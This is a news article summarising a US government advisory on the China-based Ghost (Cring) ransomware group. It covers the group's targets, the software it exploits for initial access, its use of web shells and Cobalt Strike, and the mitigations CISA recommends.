US authorities have provided new insights into the activities of the “Ghost” ransomware group, believed to be originating from China, in a recent advisory. According to the FBI, Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC), the group has targeted organizations in more than 70 countries.
Referred to by various aliases such as Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture, the Ghost ransomware group stands out as being based in China, a departure from the usual ransomware actors who are typically located in former Soviet states. Despite this geographical difference, the group’s tactics bear similarities to other ransomware operators in the cybercriminal underground.
The group often gains initial access to victim organizations by exploiting known vulnerabilities in public-facing systems, such as Fortinet FortiOS appliances, Adobe ColdFusion servers, Microsoft SharePoint, and Microsoft Exchange. Once inside a network, the Ghost actors are observed uploading a web shell to compromised servers and utilizing Windows Command Prompt and PowerShell to download and execute the Cobalt Strike Beacon malware on victim systems.
Typically, Ghost actors do not focus on maintaining persistence within compromised networks for an extended period. Instead, they move swiftly from the initial breach to deploying ransomware within a short timeframe, usually within the same day. The group is known to use Cobalt Strike and other open-source tools for privilege escalation, credential access, lateral movement, and command and control operations within the network.
One of the distinctive aspects of the Ghost ransomware group is their threat to sell exfiltrated data if ransom demands are not met. However, the group does not frequently steal a significant amount of valuable information, such as intellectual property or personally identifiable data, that could cause major harm if leaked.
The group’s preference for targeting vulnerable organizations that lack robust security measures has led to a large number of small to medium-sized businesses, critical infrastructure providers, educational institutions, healthcare organizations, government agencies, religious groups, and technology and manufacturing companies falling victim to their attacks.
To mitigate the risks posed by the Ghost ransomware group, CISA has recommended several security measures for organizations to implement. These include regularly backing up data and storing backups separately from main systems, promptly patching known vulnerabilities, network segmentation to limit lateral movement, and implementing phishing-resistant multi-factor authentication for privileged and email accounts.
In conclusion, the new details provided by US authorities shed light on the tactics and activities of the Ghost ransomware group, highlighting the importance of strong cybersecurity measures to protect organizations from falling prey to such malicious actors. By enhancing baseline security practices and staying vigilant against evolving threats, businesses and institutions can better defend themselves against ransomware attacks.